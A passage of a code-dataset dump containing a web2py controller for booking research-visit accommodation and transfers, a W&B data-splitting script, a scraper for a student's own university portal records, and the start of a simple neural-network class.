rv.arrival_date:\n # check we are inside the visit window.\n form.errors.arrival_date = 'This date is before the research visit arrival date ({}).'.format(\n rv.arrival_date.isoformat())\n else:\n # all good, so store the arrival date in session\n session.safe.arrival_datetime = arrival_datetime\n session.safe.arrival_date = form.vars.arrival_date\n\n if departure_datetime > rv.departure_date:\n form.errors.departure_date = 'This date is after the research visit departure date ({}).'.format(\n rv.departure_date.isoformat())\n\n elif arrival_datetime >= departure_datetime:\n # check the departure date is after the arrival date\n form.errors.departure_date = 'The departure date must be later than the arrival date'\n else:\n # all good, so store the departure date in session\n session.safe.departure_datetime = departure_datetime\n session.safe.departure_date = form.vars.departure_date\n\n if session.safe.departure_date is not None and session.safe.arrival_date is not None:\n __check_availability()\n\n elif action == 'add_visitor':\n\n # get the format correct \n if form.vars.user == '0':\n form.vars.user = None\n else:\n form.vars.user = int(form.vars.user)\n\n # check to see they aren't already a member\n visit_members = db(db.research_visit_member.research_visit_id == form.vars.id).select(\n db.research_visit_member.user_id)\n m = [r.user_id for r in visit_members]\n\n # strip None from m to allow multiple unknown users\n m = [x for x in m if x is not None]\n\n if form.vars.user in m:\n form.errors.user = \"User already a member of this research visit.\"\n\n elif action == 'add_project':\n\n # check this is a project visit (don't add everyone in the world!)\n if rv.project_id is None:\n form.errors.user = \"Cannot add project members for look see visits.\"\n\n # get the project members and current visit members\n project_members = db(db.project_members.project_id == rv.project_id).select(\n db.project_members.user_id)\n visit_members = db(db.research_visit_member.research_visit_id == rv.id).select(\n db.research_visit_member.user_id)\n\n p = [r.user_id for r in project_members]\n r = [r.user_id for r in visit_members]\n new = set(p).difference(r)\n\n if len(new) > 0:\n form.vars.user = new\n else:\n form.errors.user = \"No new project members to add.\"\n\n elif action == 'reserve_beds':\n\n if len(form.vars.records) == 0:\n form.errors.user = 'You must select visitors to book for.'\n\n if (form.vars.accom_arrive == '') or (form.vars.accom_depart == ''):\n form.errors.accom_arrive = 'You must set dates to book accommodation.'\n\n elif action == 'release_beds':\n\n if len(form.vars.records) == 0:\n form.errors.user = 'You must select which visitors to release beds for.'\n\n if (form.vars.accom_arrive == '') or (form.vars.accom_depart == ''):\n form.errors.accom_arrive = 'You must set dates to release accommodation.'\n\n elif action == 'book_transfer':\n\n if len(form.vars.records) == 0:\n form.errors.user = 'You must select visitors to transfer'\n\n if (form.vars.transfer_datepicker == ''):\n form.errors.transfer_datepicker = 'You must set a date to book transfers.'\n\n elif action == 'book_res_assist':\n\n if (form.vars.ra_start == '') or (form.vars.ra_end == ''):\n form.errors.ra_site_time = 'You must set dates to book research assistants.'\n\n\n# -----------------------------------------------------------------------------\n# HELPER FUNCTIONS - protected from being called as a webpage using __name()\n# -----------------------------------------------------------------------------\n\ndef __check_availability():\n \"\"\"\n Updates the availability information stored in session\n - called from check availability and post booking SAFE\n \"\"\"\n\n if ((session.safe.arrival_date is not None) &\n (session.safe.arrival_date is not None)):\n # check how many reservations overlap the whole period\n existing_res = db((db.bed_reservations_safe.departure_date > session.safe.arrival_date) &\n (db.bed_reservations_safe.arrival_date < session.safe.departure_date))\n\n # store the availability\n session.safe.avail = n_beds_available - existing_res.count()\n\n\ndef __book_beds(site_table, flds):\n \"\"\"\n Function to look for existing records in a table and book \n - expecting to be passed a dictionary of fields to insert \n via **args and that those will contain some key checking\n fields: research_visit_member_id, arrival_date, departure_date\n \"\"\"\n\n # look for existing bookings at this site that intersect this one\n existing = db((db[site_table].research_visit_member_id == flds['research_visit_member_id']) &\n (db[site_table].departure_date >= flds['arrival_date']) &\n (db[site_table].arrival_date <= flds['departure_date']))\n\n if existing.count() > 0:\n\n # otherwise find the existing selections that overlap and get the date ranges\n existing = existing.select()\n\n # need to convert dates from string\n arrival_date = datetime.datetime.strptime(flds['arrival_date'], '%Y-%m-%d').date()\n departure_date = datetime.datetime.strptime(flds['departure_date'], '%Y-%m-%d').date()\n\n arr_dates = [r.arrival_date for r in existing]\n dep_dates = [r.departure_date for r in existing]\n arr_dates.append(arrival_date)\n dep_dates.append(departure_date)\n flds['arrival_date'] = min(arr_dates)\n flds['departure_date'] = max(dep_dates)\n\n # delete the existing overlapping records\n for e in existing:\n e.delete_record()\n\n # add the new spanning record\n db[site_table].insert(**flds)\n\n\ndef __release_beds(site_table, flds):\n \"\"\"\n Function to look for existing records in a table and book \n - expecting to be passed a dictionary of fields and that those will contain\n some key checking fields: research_visit_member_id, arrival_date, departure_date\n \"\"\"\n\n # look for existing bookings at this site that intersect this one\n existing = db((db[site_table].research_visit_member_id == flds['research_visit_member_id']) &\n (db[site_table].departure_date >= flds['arrival_date']) &\n (db[site_table].arrival_date <= flds['departure_date']))\n\n if existing.count() > 0:\n\n # can only remove if there are bookings that overlap\n existing = existing.select()\n\n # need to convert dates from string\n release_start = datetime.datetime.strptime(flds['arrival_date'], '%Y-%m-%d').date()\n release_end = datetime.datetime.strptime(flds['departure_date'], '%Y-%m-%d').date()\n\n for e in existing:\n\n arr_in_ex = e.arrival_date < release_start < e.departure_date\n dep_in_ex = e.arrival_date < release_end < e.departure_date\n spans = ((release_start < e.arrival_date) &\n (e.departure_date < release_end))\n\n # look at each one in turn to see whether to delete/truncate\n if (arr_in_ex and not dep_in_ex):\n # 1) truncating the end of the visit\n e.update_record(departure_date=release_start)\n elif (not arr_in_ex and dep_in_ex):\n # 2) truncating the start of the visit\n e.update_record(arrival_date=release_end)\n elif (spans):\n # 3) visit completely covered so delete\n e.delete_record()\n elif (arr_in_ex and dep_in_ex):\n # 4) visit split by deletion period, so truncate and insert\n current_end = e.departure_date\n e.departure_date = release_start\n db[site_table].insert(**db[site_table]._filter_fields(e))\n e.arrival_date = release_end\n e.departure_date = current_end\n db[site_table].insert(**db[site_table]._filter_fields(e))\n e.delete_record()\n else:\n # non-overlapping\n pass\n\n\ndef __book_release_beds(records, site, mode):\n # book a bed for each checked record\n for rid in records:\n\n # get the user id from this row in the research_visit_member table\n rid = int(rid)\n row = db.research_visit_member(rid)\n\n # look for existing bookings at this site that intersect this one\n existing = db((db.bed_reservations.research_visit_member_id == rid) &\n (db.bed_reservations.departure_date >= session.safe.arrival_date) &\n (db.bed_reservations.arrival_date <= session.safe.departure_date) &\n (db.bed_reservations.site == site))\n\n if mode == 'book':\n\n if existing.count() == 0:\n # if nothing overlapping already exists, create a new entry\n db.bed_reservations.insert(site=site,\n research_visit_id=row.research_visit_id,\n research_visit_member_id=rid,\n arrival_date=session.safe.arrival_date,\n departure_date=session.safe.departure_date,\n user_id=row.user_id)\n else:\n # otherwise find everthing that overlaps and get the date ranges\n existing = existing.select()\n arr_dates = [r.arrival_date for r in existing]\n arr_dates.append(\n datetime.datetime.strptime(session.safe.arrival_date, '%Y-%m-%d').date())\n dep_dates = [r.departure_date for r in existing]\n dep_dates.append(\n datetime.datetime.strptime(session.safe.departure_date, '%Y-%m-%d').date())\n\n # delete the existing overlapping records\n for e in existing:\n db(db.bed_reservations.id == e.id).delete()\n\n # add the new spanning record\n db.bed_reservations.insert(site=site,\n research_visit_id=row.research_visit_id,\n research_visit_member_id=rid,\n arrival_date=min(arr_dates),\n departure_date=max(dep_dates),\n user_id=row.user_id)\n elif mode == 'release':\n\n if existing.count() > 0:\n # can only remove if there are bookings that overlap\n # TODO - add flash if there are no actions?\n existing = existing.select()\n for e in existing:\n\n arr_in_ex = e.arrival_date < session.safe.arrival_datetime < e.departure_date\n dep_in_ex = e.arrival_date < session.safe.departure_datetime < e.departure_date\n spans = ((session.safe.arrival_datetime < e.arrival_date) &\n (e.departure_date < session.safe.departure_datetime))\n\n # look at each one in turn to see whether to delete/truncate\n if (arr_in_ex and not dep_in_ex):\n # 1) truncating the end of the visit\n db(db.bed_reservations.id == e.id).update(\n departure_date=session.safe.arrival_date)\n elif (not arr_in_ex and dep_in_ex):\n # 2) truncating the start of the visit\n db(db.bed_reservations.id == e.id).update(\n departure_date=session.safe.departure_date)\n elif (spans):\n # 3) visit completely covered so delete\n db(db.bed_reservations.id == e.id).delete()\n elif (arr_in_ex and dep_in_ex):\n # 4) visit split by deletion period, so truncate and insert\n db(db.bed_reservations.id == e.id).update(\n departure_date=session.safe.arrival_date)\n db.bed_reservations.insert(site=site,\n research_visit_id=row.research_visit_id,\n research_visit_member_id=rid,\n arrival_date=session.safe.departure_date,\n departure_date=e.departure_date,\n user_id=row.user_id)\n else:\n # non-overlapping\n pass\n\n\ndef date_range(start, end):\n days = []\n curr = start\n while curr <= end:\n days.append(curr)\n curr += datetime.timedelta(days=1)\n\n return (days)\n\n\ndef export_my_research_visit():\n \"\"\"\n This fetches an excel workbook containing the intinerary for a single research\n visit and pokes it out as an http download, so a button can call the controller\n and return the file via the browser.\n \"\"\"\n\n # Get the specific visit requested\n rv_id = request.args(0)\n\n # Check if the record exists and get the workbook object\n if rv_id is not None:\n record = db.research_visit[rv_id]\n excelfile = single_rv_summary_excel(rv_id)\n if record is None:\n session.flash = CENTER(\n B('Export request for non existant research visit', _style='color:red'))\n return\n else:\n session.flash = CENTER(\n B('Export request for research visit missing a visit_id', _style='color:red'))\n return\n\n # and now poke the workbook object out to the browser\n response.headers[\n 'Content-Type'] = 'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'\n attachment = 'attachment;filename=SAFE_Bed_reservations_{}.xlsx'.format(\n datetime.date.today().isoformat())\n response.headers['Content-Disposition'] = attachment\n raise HTTP(200, excelfile,\n **{\n 'Content-Type': 'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet',\n 'Content-Disposition': attachment + ';'})\n\n\ndef export_ongoing_research_visits():\n \"\"\"\n This fetches an excel workbook compiling all ongoing and future research \n visit data and pokes it out as an http download, so a button can call the \n controller and return the file via the browser.\n \"\"\"\n\n # check there is any data\n today = datetime.date.today()\n rv_query = (db.research_visit.departure_date >= today)\n\n # no records?\n if db(rv_query).count() == 0:\n session.flash = CENTER(B('No research visit data found', _style='color:red'))\n redirect(URL('research_visits', 'research_visits'))\n else:\n # grab the data from those queries starting with the earliest arrivals\n excel_file = all_rv_summary_excel()\n\n # and now poke the workbook object out to the browser\n response.headers[\n 'Content-Type'] = 'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'\n attachment = 'attachment;filename=SAFE_Bed_reservations_{}.xlsx'.format(today.isoformat())\n response.headers['Content-Disposition'] = attachment\n raise HTTP(200, excel_file,\n **{\n 'Content-Type': 'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet',\n 'Content-Disposition': attachment + ';'})\n\n\ndef export_ongoing_research_visits_text():\n \"\"\"\n This just fetches the text summary and pokes it out as an http download\n \"\"\"\n\n # GET THE ONGOING RVs \n today = datetime.date.today()\n rv_query = (db.research_visit.departure_date >= today)\n\n # no records?\n if db(rv_query).count() == 0:\n session.flash = CENTER(B('No research visit data found', _style='color:red'))\n redirect(URL('research_visits', 'research_visits'))\n else:\n # grab the data from those queries starting with the earliest arrivals\n text_file = all_rv_summary_text()\n\n # and now poke the text object out to the browser\n response.headers['Content-Type'] = 'text/plain'\n attachment = 'attachment;filename=SAFE_Research_Visit_details_{}.txt'.format(\n datetime.date.today().isoformat())\n response.headers['Content-Disposition'] = attachment\n raise HTTP(200, text_file,\n **{'Content-Type': 'text/plain',\n 'Content-Disposition': attachment + ';'})\n\n\ndef safe_bed_availability():\n \"\"\"\n This controller:\n - creates data for a free beds view using fullcalendar javascript\n - combining this and the booking on a single page causes issues\n \"\"\"\n\n # get the dates when beds are booked and the status of the RV that\n # they are associated with\n # and select as an iterable of rows\n bed_data = db(db.bed_reservations_safe.research_visit_id == db.research_visit.id)\n rows = bed_data.select()\n\n # Need to expand the date range of a visit to calculate the\n # beds available by day\n approved = []\n pending = []\n\n for r in rows:\n\n dates = date_range(r.bed_reservations_safe.arrival_date,\n r.bed_reservations_safe.departure_date)\n\n if r.research_visit.admin_status == 'Approved':\n approved.extend(dates)\n else:\n pending.extend(dates)\n\n # now tabulate and align to get days\n pending = Counter(pending)\n approved = Counter(approved)\n\n # Calculate availability across dates with pending or approved bookings:\n # - handling admin approved overbooking by truncating to zero\n # - package into a list of dictionaries {'type', 'date', 'n'}\n dates = set(list(pending.keys()) + list(approved.keys()))\n pend = [0 if pending[d] is None else pending[d] for d in dates]\n conf = [0 if approved[d] is None else approved[d] for d in dates]\n avail = [{'type': 'available', 'date': d, 'n': max(0, n_beds_available - (x + y))}\n for x, y, d in zip(pend, conf, dates)]\n\n # get pending and approved in the same format\n pending = [{'type': 'pending', 'date': k, 'n': v} for k, v in pending.items()]\n approved = [{'type': 'confirmed', 'date': k, 'n': v} for k, v in approved.items()]\n\n # now create a list of events to pass to the view as a JS array\n colors = {'pending': '#CC9900', 'confirmed': '#CC0000', 'available': '#228B22'}\n event_order = {'confirmed': 3, 'pending': 2, 'available': 1}\n events = []\n for event in avail + pending + approved:\n events.append({'title': '{n} {type}'.format(**event),\n 'start': event['date'].isoformat(),\n 'orderField': event_order[event['type']],\n 'backgroundColor': colors[event['type']],\n 'borderColor': colors[event['type']]})\n\n return dict(events=XML(json(events)))\n\n\ndef safe_transfers_schedule():\n \"\"\"\n This controller:\n - creates data for a free beds view using fullcalendar javascript\n - combining this and the booking on a single page causes issues\n - serves up the data from this query:\n select t.transfer_date, t.transfer, r.admin_status, count(t.research_visit_member_id) \n from transfers t \n join research_visit r\n on (t.research_visit_id = r.id)\n where r.admin_status <> 'Draft'\n group by t.transfer_date, t.transfer, r.admin_status\n order by t.transfer_date;\n \"\"\"\n\n # get counts of people on each transfer route by RV status\n qry = ((db.transfers.research_visit_id == db.research_visit.id) &\n (db.research_visit.admin_status != 'Draft'))\n # set up a condition test \n is_approved = (db.research_visit.admin_status == 'Approved').case('Yes', 'No')\n transfer_data = db(qry).select(db.transfers.transfer_date.with_alias('date'),\n db.transfers.transfer.with_alias('transfer'),\n is_approved.with_alias('approved'),\n db.transfers.research_visit_member_id.count().with_alias(\n 'count'),\n groupby=[db.transfers.transfer_date,\n db.transfers.transfer,\n db.research_visit.admin_status])\n\n # now package up that data as event data for calendar.js, and \n # poke it back to the view, where it will populate the calendar\n colors = {'No': '#CC9900', 'Yes': '#228B22'}\n\n events = []\n for row in transfer_data:\n events.append({'title': '{transfer}: {count}'.format(**row),\n 'start': row.date.isoformat(),\n 'orderField': 1,\n 'backgroundColor': colors[row.approved],\n 'borderColor': colors[row.approved]})\n\n # helpfully the JSON serialiser makes JS compatible inputs, which\n # just needs to be protected from HTML mangling\n return dict(events=XML(json(events)), frm=get_frm())\n\n\n# -----------------------------------------------------------------------------\n# ADMINISTER NEW VISITS\n# -----------------------------------------------------------------------------\n\n\n# decorator restricts access to admin users\n# - the link is only revealed in the menu for admin users but \n# that doesn't prevent pasting in the link!\n@auth.requires_membership('admin')\ndef administer_research_visits():\n \"\"\"\n This controller handles:\n - presenting admin users with a list of current submitted proposals for research visits \n - allows the admin to approve or reject visit requests but also gives write access \n and admins have unlocked constraints on dates and beds, so can add to a users proposal\n \"\"\"\n\n links = [dict(header='', body=lambda row: approval_icons[row.admin_status]),\n dict(header='', body=lambda row: A('Details', _class='button btn btn-default'\n , _href=URL(\"research_visits\",\n \"research_visit_details\",\n args=[row.id])))\n ]\n\n db.research_visit.admin_status.readable = False\n\n # get a query of pending requests with user_id\n form = SQLFORM.grid(query=(db.research_visit.admin_status == 'Submitted'), csv=False,\n fields=[db.research_visit.project_id,\n db.research_visit.title,\n db.research_visit.admin_status],\n maxtextlength=250,\n deletable=False,\n editable=False,\n create=False,\n details=False,\n links=links\n )\n\n return dict(form=form)\n\n\n# -----------------------------------------------------------------------------\n# SERVICES\n# -----------------------------------------------------------------------------\n\ndef call():\n session.forget()\n return service()\n\n\n@service.json\ndef check_safe_bed_availability():\n \"\"\"\n JSON service to get the maximum number of available beds \n between two dates\n \"\"\"\n\n try:\n # get the from and to dates from the call\n from_date = datetime.datetime.strptime(request.vars['from'], '%Y-%m-%d').date()\n to_date = datetime.datetime.strptime(request.vars['to'], '%Y-%m-%d').date()\n\n # find overlapping bookings - each row is a person for a time range\n rows = db(~(db.bed_reservations_safe.departure_date <= from_date) &\n ~(db.bed_reservations_safe.arrival_date >= to_date)).select()\n\n # find the maximum number of beds booked:\n # i) range of dates for each overlapping booking within\n # the query window\n dates = [date_range(max(from_date, r.arrival_date),\n min(to_date, r.departure_date))\n for r in rows]\n # ii) unpack and get availability, truncating at zero.\n dates = Counter([dt for bk in dates for dt in bk])\n if list(dates.values()):\n n_taken = max(dates.values())\n else:\n n_taken = 0\n\n n_avail = max(0, n_beds_available - n_taken)\n\n # return the availability\n return json(dict(avail_msg='{} beds available at SAFE'.format(n_avail)))\n except Exception:\n return json(dict(avail_msg='Bed availability could not be verified'.format(n_avail)))\n\n\n@service.json\ndef get_project_dates():\n try:\n # get the variables from the call\n project_id = request.vars['project_id']\n rec = db(db.project_details.project_id == project_id).select().first()\n\n # return the availability\n return json(dict(found=True,\n start=rec.start_date.isoformat(),\n end=rec.end_date.isoformat()))\n except Exception:\n start_date = (datetime.date.today() + datetime.timedelta(days=14))\n end_date = (datetime.date.today() + datetime.timedelta(days=365))\n return json(dict(found=False,\n start=start_date.isoformat(),\n end=end_date.isoformat()))\n\n\n@service.json\ndef check_transfer_availability():\n # get the variables from the call\n date = request.vars['date']\n\n existing_res = db(db.transfers.transfer_date == date).count()\n\n # return the availability\n return json(dict(n_avail=n_transfers_available - existing_res))\n","repo_name":"ImperialCollegeLondon/safe_web","sub_path":"controllers/research_visits.py","file_name":"research_visits.py","file_ext":"py","file_size_in_byte":112601,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"42732187461","text":"#!/usr/bin/env python\n\nimport logging\nimport os\nimport tempfile\n\nimport hydra\nfrom omegaconf import DictConfig\n\nimport pandas as pd\nimport wandb\nfrom sklearn.model_selection import train_test_split\n\n\nlogging.basicConfig(level=logging.INFO, format=\"%(asctime)-15s %(message)s\")\nlogger = logging.getLogger()\n\n\n@hydra.main(config_name='config')\ndef go(config: DictConfig):\n\n wandb.login(key=config['wandb']['api_key'])\n run = wandb.init(project=config['wandb']['project'], job_type=config['wandb']['job_type'])\n\n logger.info(\"Downloading and reading artifact\")\n artifact = run.use_artifact(config['artifact']['input'])\n artifact_path = artifact.file()\n\n df = pd.read_csv(artifact_path, low_memory=False)\n\n # Split model_dev/test\n logger.info(\"Splitting data into train and test\")\n splits = {}\n\n ###################################\n # COMPLETE the following line #\n ###################################\n\n splits[\"train\"], splits[\"test\"] = train_test_split(\n df,\n test_size=config['parameters']['test_size'],\n random_state=config['parameters']['random_state'],\n stratify=df[config['parameters']['stratify']] if config['parameters']['stratify'] != 'null' else None,\n )\n\n # Now we save the artifacts. We use a temporary directory so we do not leave\n # any trace behind\n with tempfile.TemporaryDirectory() as tmp_dir:\n\n for split, df in splits.items():\n\n # Make the artifact name from the provided root plus the name of the split\n artifact_name = f\"{config['artifact']['output_root_name']}_{split}.csv\"\n\n # Get the path on disk within the temp directory\n temp_path = os.path.join(tmp_dir, artifact_name)\n\n logger.info(f\"Uploading the {split} dataset to {artifact_name}\")\n\n # Save then upload to W&B\n df.to_csv(temp_path)\n\n artifact = wandb.Artifact(\n name=artifact_name,\n type=config['artifact']['type'],\n description=f\"{split} split of dataset {config['artifact']['input']}\",\n )\n artifact.add_file(temp_path)\n\n logger.info(\"Logging artifact\")\n run.log_artifact(artifact)\n\n # This waits for the artifact to be uploaded to W&B. If you\n # do not add this, the temp directory might be removed before\n # W&B had a chance to upload the datasets, and the upload\n # might fail\n artifact.wait()\n\n\nif __name__ == \"__main__\":\n go()\n","repo_name":"AndreaCaliandro/mlops","sub_path":"lesson-2-data-exploration-and-preparation/exercises/exercise_6/starter/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":2538,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"16129577793","text":"import json\nfrom urllib.parse import parse_qs\nfrom bs4 import BeautifulSoup\nimport requests\nfrom pandas import read_html,isna\nimport re\n\n\n\n\ndef Get_SRMacad_Details(email : str , passwd : str):\n if(email == None or passwd == None):\n return \"Please provide email and password in the header\"\n \n curSession = requests.Session() \n # all cookies received will be stored in the session object\n\n curSession.get(\"https://academia.srmist.edu.in/\")\n\n headers = {\n 'Accept': '*/*',\n 'Accept-Language': 'en-US,en;q=0.9',\n 'Connection': 'keep-alive',\n 'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',\n 'Origin': 'https://academia.srmist.edu.in',\n 'Referer': 'https://academia.srmist.edu.in/accounts/signin?_sh=false&hideidp=true&portal=10002227248&client_portal=true&dcc=true&servicename=ZohoCreator&service_language=en&serviceurl=https%3A%2F%2Facademia.srmist.edu.in%2F',\n 'Sec-Fetch-Dest': 'empty',\n 'Sec-Fetch-Mode': 'cors',\n 'Sec-Fetch-Site': 'same-origin',\n 'User-Agent': 'Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.64 Mobile Safari/537.36',\n 'sec-ch-ua': '\" Not A;Brand\";v=\"99\", \"Chromium\";v=\"101\", \"Google Chrome\";v=\"101\"',\n 'sec-ch-ua-mobile': '?1',\n 'sec-ch-ua-platform': '\"Android\"',\n }\n\n data = {\n 'username': email,\n 'password': passwd,\n 'client_portal': 'true',\n 'dcc': 'true',\n 'serviceurl': 'https://academia.srmist.edu.in/',\n 'servicename': 'ZohoCreator',\n 'portal': '10002227248',\n 'service_language': 'en',\n 'is_ajax': 'true',\n 'grant_type': 'password',\n }\n\n response = curSession.post('https://academia.srmist.edu.in/accounts/signin.ac', headers=headers, data=data)\n json_data = json.loads(response.text)\n \n if json_data.get('error') != None:\n return json_data\n\n headers = {'Origin': 'https://academia.srmist.edu.in',\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36' }\n params = parse_qs(json_data['data']['token_params'])\n params['state'] = 'https://academia.srmist.edu.in/'\n r = curSession.get(json_data['data']['oauthorize_uri'], data=params, headers=headers)\n\n attendanceURL = \"https://academia.srmist.edu.in/srm_university/academia-academic-services/page/My_Attendance\"\n attendancePage = curSession.get(attendanceURL).text\n\n TimetableURL = \"https://academia.srmist.edu.in/srm_university/academia-academic-services/page/My_Time_Table_2022_23\"\n TimetablePage = curSession.get(TimetableURL).text\n \n # AcademicPlannerODDURL = \"https://academia.srmist.edu.in/srm_university/academia-academic-services/page/Academic_Planner_2022_23_ODD\"\n # AcademicPlannerOddPage = curSession.get(AcademicPlannerODDURL).text\n\n # AcademicPlannerEVENURL = \"https://academia.srmist.edu.in/srm_university/academia-academic-services/page/Academic_Planner_2021_22_EVEN\"\n # AcademicPlannerEvenPage = curSession.get(AcademicPlannerEVENURL).text\n \n # Prettify Output\n attendancePage = attendancePage.encode('raw_unicode_escape').decode('unicode_escape')\n attendancePage = attendancePage.encode('raw_unicode_escape').decode('unicode_escape')\n\n TimetablePage = TimetablePage.encode('raw_unicode_escape').decode('unicode_escape')\n TimetablePage = TimetablePage.encode('raw_unicode_escape').decode('unicode_escape')\n\n\n # Remove Unwanted Parts\n\n TimetablePage\n a = TimetablePage.find('

    \")\n TimetablePage = TimetablePage[a:b]\n\n # AttendancePage\n a = attendancePage.find('

    ')\n attendancePage = attendancePage[a:b]\n \n # Page to Soup\n attendancePageSoup = BeautifulSoup(attendancePage , 'html5lib')\n TimetablePageSoup = BeautifulSoup(TimetablePage , 'html5lib')\n table = attendancePageSoup.find_all('table')\n # Get User Details\n details = attendancePageSoup.find_all(\"td\")[:14]\n User_Info = {}\n fieldName = None\n for idx,data in enumerate(details):\n if idx % 2 == 0:\n fieldName = data.text\n User_Info[fieldName] = None\n continue\n User_Info[fieldName] = data.text\n # A variable that is not defined.\n # UserInfo\n # Get FieldName\n Field_Name = []\n Column_name = table[1].find_next('tr').find_all('td')\n for tableData in Column_name:\n Field_Name.append(tableData.text)\n # FieldName = json.dumps(Field_Name)\n # Attendance Scaping\n attendance_details = {}\n data = table[1].find_all('tr')[1:]\n for tableRow in data:\n info = []\n for name in tableRow.findAll('td'):\n info.append(name.text)\n if info[2] == 'Practical':\n attendance_details[tableRow.find_next('td').text[:9] + 'P'] = info\n else:\n attendance_details[tableRow.find_next('td').text[:9]] = info\n # Attendance = json.dumps(attendance_details)\n \n # SubjectCode with Subject Name\n data = table[1].find_all('tr')[1:]\n subjectCode = {}\n for tableRow in data:\n data = tableRow.find_all('td')\n subject_code = data[0].text[:9]\n name = data[1].text\n subjectCode[subject_code] = name\n \n # Get mark FieldName\n Marks_Field_Name = []\n Column_name = table[2].find_next('tr').find_all('td')\n for tableData in Column_name:\n Marks_Field_Name.append(tableData.text)\n # MarksFieldName = json.dumps(Marks_Field_Name)\n # MarksFieldName\n \n # Scapeing marks\n df = read_html(table[2].prettify() , flavor='html5lib')\n odd = [i for i in range(2 , len(df[0])) if i % 2 == 0]\n df1 = df[0].drop(odd)\n df1[2].fillna(value = \"None\",inplace = True)\n\n def getMarks(i):\n MarkList = re.findall(r\"\\d+\\.\\d+\", i)\n MarkList = [float(mark) for mark in MarkList]\n return MarkList\n\n mark_details = {}\n # if len(df1) < 2 return mark_details\n for i in df1.index:\n if i == 0: continue\n if isna(df1[2][i]): df1[2][i] = 'No Data'\n subject_code = df1[0][i]\n subject_name = subjectCode.get(subject_code) if subjectCode.get(subject_code) != None else subject_code\n if mark_details.get(subject_name) == None:\n mark_details[subject_name] = getMarks(df1[2][i])\n else:\n mark_details[subject_name + ' Practical'] = getMarks(df1[2][i])\n # markDetails = json.dumps(mark_details)\n # markDetails\n \n \n \n \n # Fetch Faculty Details\n TimeTableToDF = read_html(TimetablePageSoup.find_all('table')[1].prettify() , flavor='html5lib')\n TimeTableToDF[0].fillna(value = \"None\",inplace = True)\n FacultyInfo = TimeTableToDF[0].loc[:].values.tolist()[1:-1]\n # FacultyInfo\n \n Details = {}\n Details['attendanceFieldName'] = Field_Name\n Details['attendance'] = attendance_details\n Details['userInfo'] = User_Info\n Details['marks'] = mark_details\n Details['facultyInfo'] = FacultyInfo\n Details['SubcodetoName'] = subjectCode\n \n \n \n Details = json.dumps(Details)\n return Details\n","repo_name":"ayushhsinghh/SRMAcademiaAPI","sub_path":"SRMacad.py","file_name":"SRMacad.py","file_ext":"py","file_size_in_byte":7937,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"21674950931","text":"import numpy as np\nfrom .Functions import ActivFunction, LossFunction, Identity\n\n\nclass NN_model:\n def __init__(\n self,\n layers: list,\n activ_f: ActivFunction,\n loss_f: LossFunction,\n output_f: ActivFunction = Identity,\n ):\n \"\"\"Feed-forward NN model.\n\n Args:\n layers (list): number of units per layer.\n activ_f (ActivFunction): activation function for the hidden layers.\n loss_f (LossFunction): loss function.\n output_f (ActivFunction): activation function for the output layer.\n Defaults to `Identity`.\n \n Examples\n --------\n The X and Y are lists of `numpy` vectors, with lenths of 4 and 2 respectively.\n >>> model = NN_model([4, 5, 3, 2], Sigmoid, MSE)\n >>> model = model.init_weights()\n >>> for i in range(len(X)):\n ... model.zero_grad()\n ... out = model(X[i])\n ... loss = model.loss(Y[i])\n ... print(loss)\n ... g = model.grad().get_grad()\n ... model.Weights = model.Weights - 0.5*g\n ...\n \"\"\"\n # input layer does not count\n n_layers = len(layers) - 1\n # for each layer, a matrix of weights\n self.weights = []\n # D_weights[i] is the gradient of the Loss w.r.t. weights[i]\n self.D_weights = []\n for i in range(n_layers):\n fan_in = layers[i]\n fan_out = layers[i + 1]\n fan_in += 1 # for the layer bias\n shape = (fan_out, fan_in)\n w = np.zeros(shape)\n D_w = np.zeros(shape)\n self.weights.append(w)\n self.D_weights.append(D_w)\n\n self.activ_fs = [activ_f() for i in range(n_layers - 1)]\n # output layer with Identity activ function\n self.activ_fs.append(Identity())\n self.loss_f = loss_f()\n # for each layer, keep track of the output\n self.outs = [None] * n_layers\n # D_outs[i] is the gradient of the Loss w.r.t. outs[i]\n self.D_outs = [None] * n_layers\n # keep track of the last input to the model\n self.input = None\n\n def init_weights(self):\n n_layers = len(self.weights)\n # glorot's initalization\n for i in range(n_layers):\n shape_i = self.weights[i].shape\n fan_in = shape_i[1]\n fan_out = shape_i[0]\n a = 6 / (fan_in + fan_out)\n a = np.sqrt(a)\n self.weights[i] = np.random.uniform(low=-a, high=a, size=shape_i)\n\n @property\n def Weights(self):\n total_weights = [w.ravel() for w in self.weights]\n return np.concatenate(total_weights)\n \n @Weights.setter\n def Weights(self, ws):\n p = 0\n n_layers = len(self.weights)\n for i in range(n_layers):\n size = self.weights[i].size\n slice = ws[p : p + size]\n self.weights[i] = slice.reshape(self.weights[i].shape)\n p += size\n\n def __call__(self, input: np.ndarray) -> np.ndarray:\n self.input = np.append(input, [1.0]) # for bias\n n_layers = len(self.weights)\n\n # first layer\n ls_in = np.dot(self.weights[0], self.input)\n self.outs[0] = self.activ_fs[0](ls_in)\n self.outs[0] = np.append(self.outs[0], [1.0]) # bias\n # other layers\n for i in range(1, n_layers):\n ls_in = np.dot(self.weights[i], self.outs[i - 1])\n self.outs[i] = self.activ_fs[i](ls_in)\n if i < n_layers - 1:\n self.outs[i] = np.append(self.outs[i], [1.0]) # bias\n # return output of last layer\n return self.outs[-1]\n\n def loss(self, target: np.ndarray):\n x = self.outs[-1]\n return self.loss_f(x, target)\n\n def grad(self):\n \"\"\"Compute and store (by summing) the gradient of the weights\n w.r.t. the last loss value computed.\n \"\"\"\n n_layers = len(self.weights)\n\n loss_grad = self.loss_f.grad\n self.D_outs[-1] = loss_grad\n\n # loop in reverse, up to first hidden layer (excluded)\n for i in 